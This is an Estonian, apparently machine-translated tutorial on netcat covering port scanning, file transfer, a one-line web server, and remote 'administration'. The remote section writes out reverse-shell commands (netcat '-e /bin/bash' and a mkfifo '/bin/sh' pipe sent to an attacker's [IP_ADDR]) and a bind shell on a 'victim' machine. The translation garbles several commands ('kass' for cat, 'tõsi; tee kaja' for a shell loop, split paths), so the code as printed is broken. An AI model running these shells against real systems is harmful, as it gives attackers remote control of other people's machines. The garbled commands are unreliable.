Lühike erinevus netcat-traditsioonilise ja netcat-openbsd vahel
Netcati jaoks on saadaval kaks sarnast paketti, nende vahel on väike erinevus.
netkass-traditsiooniline sisaldab täiendavat valikut '-e', mida saab kasutada programmi sidumiseks (st.e bash) võrgukassiga. See funktsioon on kaughalduse jaoks väga kasulik.
netcat-openbsd on mõningane täiendav tugi IPv6 ja puhverserveritele.
Netcati installimine
Kuigi netcat on enamikus Linuxi distributsioonides eelinstallitud, kuid kui seda pole, saab selle järgmiste käskude abil hõlpsasti installida.
Traditsioonilise pakendi jaoks,
[meiliga kaitstud]: ~ $ sudo apt-get install netcat-traditionalOpenBSD versiooni jaoks,
[meiliga kaitstud]: ~ $ sudo apt-get install netcat-openbsdNetcati Windowsi jaoks saab alla laadida siit https: // sourceforge.net / projektid / nc110 / failid /.
Nüüd uurime mõningaid huvitavaid netcati kasutamise juhtumeid
Pordi skaneerimine netcati abil
Avatud portide otsimiseks kasutage valikut '-z'. Netcat püüab UDP korral ühendada iga pordiga ilma andmeid või väga piiratud andmeid saatmata. Sisestage järgmine
[meiliga kaitstud]: ~ $ nc -z -v hackme.org 80... jupp ..
hackme.org [217.78.1.155] 80 (http) avatud
Pordivahemiku otsimiseks tippige
[meiliga kaitstud]: ~ $ nc -z -nv 192.168.100.72 20–80(Tundmatu) [192.168.100.72] 80 (http) avatud
(Tundmatu) [192.168.100.72] 22 (ssh) avatud
Failiedastus netcatiga
Teine kasulik netcati kasutusjuht on failide edastamine kaugarvutite vahel. Tekste ja binaarfaile saate saata ühest arvutist teise arvutisse. Püüame saata faili “fail.pdf ”Linuxi arvutist Windowsi arvutisse [IP 192.168.100.72] kasutades näiteks netcati.
Tippige Windowsi masinasse (vastuvõtjas) järgmine
C: \ Kasutajad> nc -nvlp 1337> fail.pdfKuulamine saates [0.0.0.0] (perekond 2, sadam 1337)
Linuxi masinasse (saatja) tippige järgmine
[meiliga kaitstud]: ~ $ nc -nv 192.168.100.72 1337 < file.pdfÜhendus 192-ga.168.100.72 1337 port [tcp / *] õnnestus!
Kaughaldus koos netcatiga
Netcati üks parimaid kasutusjuhtumeid on kaughaldus, see tähendab, et saate juhtida kellegi teise arvutit netcati abil. Netcat-traditional sisaldab valikut '-e', mida saab kasutada programmi sidumiseks (st.e cmd.exe Windowsis või bash Linuxis) koos pordiga, see tähendab, et netcat toimib programmi ja kaugarvuti vahel suhtlejana. Netcat võtab vastu käske kaugarvutist, täidab kohalikus süsteemis ja saadab tulemused kaugarvutisse tagasi. Seda funktsiooni kasutatakse laialdaselt pahatahtlikel eesmärkidel, arvutite ja serverite tagauste hoidmiseks. See funktsioon on saadaval ainult traditsioonilises netcat-versioonis, kuid väikese nipiga saab netcat-openbsd kasutada ka samal eesmärgil. Teiste arvutite juhtimiseks võite kasutada kahte viisi.
Sees Tagurpidi kest ühendus, kuulab ründaja sadamat ja ootab ohvrimasinast ühenduse saamist. Seda kasutatakse juhul, kui ohvriarvuti on NAT-i taga või tal pole avalikku IP-d.
Netcati abil vastupidise kesta saamiseks peate kuulama netcati abil pordis. Sisestage ründaja masinasse järgmine,
[meiliga kaitstud]: ~ $ nc -nvlp 1337Kuulamine saates [0.0.0.0] (perekond 2, sadam 1337)
Ohvri masinal (kui netkass-traditsiooniline on installitud)
// asendage “/ bin / bash” tekstiga “cmd.exe ”Windowsi puhul
[meiliga kaitstud]: ~ $ nc -nv [IP_ADDR] 1337 -e / bin / bashSest netcat-openbsd (kus valikut „-e” ei toetata)
[meiliga kaitstud]: ~ $ rm / tmp / f; mkfifo / tmp / f; kass/ tmp / f | / bin / sh -i 2> & 1 | nc [IP_ADDR] 1337> / tmp / f
Ajal olles Seo kest Ühendab ründaja ohvrimasinas oleva pordi ja loob ühenduse kliendipesa abil. Seda kasutatakse juhul, kui ründaja masin on NAT-i taga või tal pole avalikku IP-d.
Ohvri masinal tippige
[meiliga kaitstud]: ~ $ nc -nlvp 1337 -e / bin / bashkuulab [mis tahes] 1337-d ..
Nüüd ohvri masinas käskude käivitamiseks tippige
[kaitstud meiliga]: ~ $ nc -nv 127.0.0.1 1337Ühendus 127-ga.0.0.1 1337 port [tcp / *] õnnestus!
$ id
uid = 1000 (asad) gid = 1000 (asad) rühma = 1000 (asad), 4 (adm), 24 (cdrom), 27 (sudo),
30 (dip), 46 (plugdev), 118 (lpadmin), 129 (sambashare)
Netcati kasutav lihtne veebiserver
Võite teha ka teise lihtsa triki, et kasutada netcati minimaalselt ühe lehega veebiserverina. See veebiserver oleks väga lihtne, ilma eriliste seadistusteta ja me kasutame selleks HTML-koodi brauserisse saatmist.
[meiliga kaitstud]: ~ $ tõsi; tee kaja -e "HTTP / 1.1 200 OK \ n \ n $ (kaja "
Minu lihtne veebiteenus, mis kasutab netcati
")" | nc-nvlp 1337; tehtudKuulamine saates [0.0.0.0] (perekond 2, sadam 1337)
Proovige nüüd veebileht tuua lokkimist kasutades
[meiliga kaitstud]: ~ $ curl http: // 127.0.0.1: 1337 /Minu lihtne veebiteenus, mis kasutab netcati
Määrake netcati seansi aegumine
Netcati seansi ajalõpu saate määrata, kasutades valikut “-w”. Netcat katkestab seansi automaatselt pärast määratud aja möödumist.
// -w [aeg sekundites][meiliga kaitstud]: ~ $ nc -w 40 -nvlp 1337
Kuulamine saates [0.0.0.0] (perekond 2, port 1234)
Jätkake kuulamist, isegi kui klient sulgeb ühenduse
Tavarežiimis lülitab netcat server välja ja lõpetab pordi kuulamise, kui klient ühenduse katkestab. Serverit saate üleval hoida, kasutades valikut “-k”
[meiliga kaitstud]: ~ $ nc -k -nlvp 1234Kuulamine saates [0.0.0.0] (perekond 2, port 1234)
Järeldus
Netcat on lihtne, kuid tõhus utiliit, mida saab kasutada paljude igapäevaste ülesannete täitmiseks. See on eelinstallitud peaaegu igasse UNIX-i nagu operatsioonisüsteemidesse ja seda saab kasutada mitmesuguste ülesannete täitmiseks, näiteks kahe arvuti vaheliseks suhtlemiseks, failiedastuseks ja paljuks muuks.